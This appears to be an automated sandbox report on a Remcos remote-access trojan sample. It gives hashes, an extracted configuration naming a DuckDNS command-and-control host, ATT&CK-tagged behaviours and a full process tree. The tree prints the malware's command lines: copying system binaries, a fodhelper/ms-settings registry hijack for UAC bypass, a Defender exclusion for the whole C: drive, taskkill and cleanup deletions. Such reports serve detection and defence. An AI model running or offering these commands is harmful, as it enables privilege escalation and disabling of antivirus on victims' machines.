Analysis
-
max time kernel
142s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
25-07-2024 07:05
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240709-en
General
-
Target
MalwareBazaar.exe
-
Size
1.0MB
-
MD5
c9849a6295f2527f02fd7b9a0664d401
-
SHA1
9db9709ad5446150bff3c3a4d193979753904866
-
SHA256
52a6184f61de86b9bfe6abf00bbcf297a308bd91effb754d3bf16fd132384071
-
SHA512
0f330d7bc780dbb1b9ef2bc92e018c29523aca29fda9e3f3f785e4c8f6fc06181e0e4c5bb5ad59f7a34409affa606d9d19c4f13981e8097c95778beef6cbd3ea
-
SSDEEP
24576:E6Dlm/atGKanKxvdwEHfZTX0u/nJaRj9yin1mV/aJscLc:DDcCZfx+GQRjj1mj
Malware Config
Extracted
remcos
RemoteHost
127.0.0.1:52121
officerem.duckdns.org:52121
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-UNX1LL
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 19 IoCs
Processes:
ngtepnyT.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 1752 ngtepnyT.pif 2596 alpha.exe 2988 alpha.exe 3068 alpha.exe 2320 alpha.exe 1384 alpha.exe 2576 alpha.exe 2408 xkn.exe 2328 alpha.exe 2312 ger.exe 2324 alpha.exe 2476 alpha.exe 2872 alpha.exe 1884 alpha.exe 1732 alpha.exe 2160 alpha.exe 1488 alpha.exe 1820 alpha.exe 1028 alpha.exe -
Loads dropped DLL 9 IoCs
Processes:
MalwareBazaar.execmd.exealpha.exexkn.exealpha.exepid process 2276 MalwareBazaar.exe 2276 MalwareBazaar.exe 936 cmd.exe 936 cmd.exe 936 cmd.exe 2576 alpha.exe 2408 xkn.exe 2408 xkn.exe 2328 alpha.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
MalwareBazaar.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tynpetgn = "C:\\Users\\Public\\Tynpetgn.url" MalwareBazaar.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MalwareBazaar.exedescription pid process target process PID 2276 set thread context of 1752 2276 MalwareBazaar.exe ngtepnyT.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MalwareBazaar.exengtepnyT.pifextrac32.exeSndVol.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MalwareBazaar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ngtepnyT.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEalpha.exepid process 2296 PING.EXE 2476 alpha.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2336 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings\shell\open ger.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xkn.exeMalwareBazaar.exepid process 2408 xkn.exe 2276 MalwareBazaar.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2408 xkn.exe Token: SeDebugPrivilege 2336 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SndVol.exepid process 1860 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
SndVol.exepid process 1860 SndVol.exe 1860 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
MalwareBazaar.exengtepnyT.pifcmd.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2276 wrote to memory of 1752 2276 MalwareBazaar.exe ngtepnyT.pif PID 2276 wrote to memory of 1752 2276 MalwareBazaar.exe ngtepnyT.pif PID 2276 wrote to memory of 1752 2276 MalwareBazaar.exe ngtepnyT.pif PID 2276 wrote to memory of 1752 2276 MalwareBazaar.exe ngtepnyT.pif PID 2276 wrote to memory of 1752 2276 MalwareBazaar.exe ngtepnyT.pif PID 2276 wrote to memory of 1752 2276 MalwareBazaar.exe ngtepnyT.pif PID 1752 wrote to memory of 936 1752 ngtepnyT.pif cmd.exe PID 1752 wrote to memory of 936 1752 ngtepnyT.pif cmd.exe PID 1752 wrote to memory of 936 1752 ngtepnyT.pif cmd.exe PID 1752 wrote to memory of 936 1752 ngtepnyT.pif cmd.exe PID 936 wrote to memory of 3028 936 cmd.exe extrac32.exe PID 936 wrote to memory of 3028 936 cmd.exe extrac32.exe PID 936 wrote to memory of 3028 936 cmd.exe extrac32.exe PID 936 wrote to memory of 2596 936 cmd.exe alpha.exe PID 936 wrote to memory of 2596 936 cmd.exe alpha.exe PID 936 wrote to memory of 2596 936 cmd.exe alpha.exe PID 936 wrote to memory of 2988 936 cmd.exe alpha.exe PID 936 wrote to memory of 2988 936 cmd.exe alpha.exe PID 936 wrote to memory of 2988 936 cmd.exe alpha.exe PID 936 wrote to memory of 3068 936 cmd.exe alpha.exe PID 936 wrote to memory of 3068 936 cmd.exe alpha.exe PID 936 wrote to memory of 3068 936 cmd.exe alpha.exe PID 3068 wrote to memory of 2448 3068 alpha.exe extrac32.exe PID 3068 wrote to memory of 2448 3068 alpha.exe extrac32.exe PID 3068 wrote to memory of 2448 3068 alpha.exe extrac32.exe PID 936 wrote to memory of 2320 936 cmd.exe alpha.exe PID 936 wrote to memory of 2320 936 cmd.exe alpha.exe PID 936 wrote to memory of 2320 936 cmd.exe alpha.exe PID 2320 wrote to memory of 2396 2320 alpha.exe extrac32.exe PID 2320 wrote to memory of 2396 2320 alpha.exe extrac32.exe PID 2320 wrote to memory of 2396 2320 alpha.exe extrac32.exe PID 936 wrote to memory of 1384 936 cmd.exe alpha.exe PID 936 wrote to memory of 1384 936 cmd.exe alpha.exe PID 936 wrote to memory of 1384 936 cmd.exe alpha.exe PID 1384 wrote to memory of 2424 1384 alpha.exe extrac32.exe PID 1384 wrote to memory of 2424 1384 alpha.exe extrac32.exe PID 1384 wrote to memory of 2424 1384 alpha.exe extrac32.exe PID 936 wrote to memory of 2576 936 cmd.exe alpha.exe PID 936 wrote to memory of 2576 936 cmd.exe alpha.exe PID 936 wrote to memory of 2576 936 cmd.exe alpha.exe PID 2576 wrote to memory of 2408 2576 alpha.exe xkn.exe PID 2576 wrote to memory of 2408 2576 alpha.exe xkn.exe PID 2576 wrote to memory of 2408 2576 alpha.exe xkn.exe PID 2408 wrote to memory of 2328 2408 xkn.exe alpha.exe PID 2408 wrote to memory of 2328 2408 xkn.exe alpha.exe PID 2408 wrote to memory of 2328 2408 xkn.exe alpha.exe PID 2328 wrote to memory of 2312 2328 alpha.exe ger.exe PID 2328 wrote to memory of 2312 2328 alpha.exe ger.exe PID 2328 wrote to memory of 2312 2328 alpha.exe ger.exe PID 936 wrote to memory of 2324 936 cmd.exe alpha.exe PID 936 wrote to memory of 2324 936 cmd.exe alpha.exe PID 936 wrote to memory of 2324 936 cmd.exe alpha.exe PID 2324 wrote to memory of 2336 2324 alpha.exe taskkill.exe PID 2324 wrote to memory of 2336 2324 alpha.exe taskkill.exe PID 2324 wrote to memory of 2336 2324 alpha.exe taskkill.exe PID 936 wrote to memory of 2476 936 cmd.exe alpha.exe PID 936 wrote to memory of 2476 936 cmd.exe alpha.exe PID 936 wrote to memory of 2476 936 cmd.exe alpha.exe PID 2476 wrote to memory of 2296 2476 alpha.exe PING.EXE PID 2476 wrote to memory of 2296 2476 alpha.exe PING.EXE PID 2476 wrote to memory of 2296 2476 alpha.exe PING.EXE PID 936 wrote to memory of 2872 936 cmd.exe alpha.exe PID 936 wrote to memory of 2872 936 cmd.exe alpha.exe PID 936 wrote to memory of 2872 936 cmd.exe alpha.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Users\Public\Libraries\ngtepnyT.pifC:\Users\Public\Libraries\ngtepnyT.pif2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CEF3.tmp\CEF4.tmp\CEF5.bat C:\Users\Public\Libraries\ngtepnyT.pif"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵PID:3028
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
PID:2596 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
PID:2988 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵PID:2448
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵PID:2396
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵PID:2424
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""7⤵
- Executes dropped EXE
- Modifies registry class
PID:2312 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2296 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"4⤵
- Executes dropped EXE
PID:2872 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"4⤵
- Executes dropped EXE
PID:1884 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
PID:1732 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2160 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1488 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1820 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1028 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\\Users\\Public\\Libraries\\Tynpetgn.PIF2⤵
- System Location Discovery: System Language Discovery
PID:2272 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1860
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD58a87409f64a997382c49769c7959d5cb
SHA19aa18f43371ee54293f32c9418b98ad957780d06
SHA2568f116fdeb296c23b577ad90e0ed3d621149d61b2ac6c039df741ab3a0bfb8400
SHA512c83a94de4474282f038237568058534f2fb72c474dc381e73b88bd780dad18717217a6e5ba02516a76d49eadad71970254c9071087288fb26339a905d02406df
-
Filesize
1KB
MD5e62f427202d3e5a3ba60ebe78567918c
SHA16ef0cd5ba6c871815fceb27ff095a7931452b334
SHA25606bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119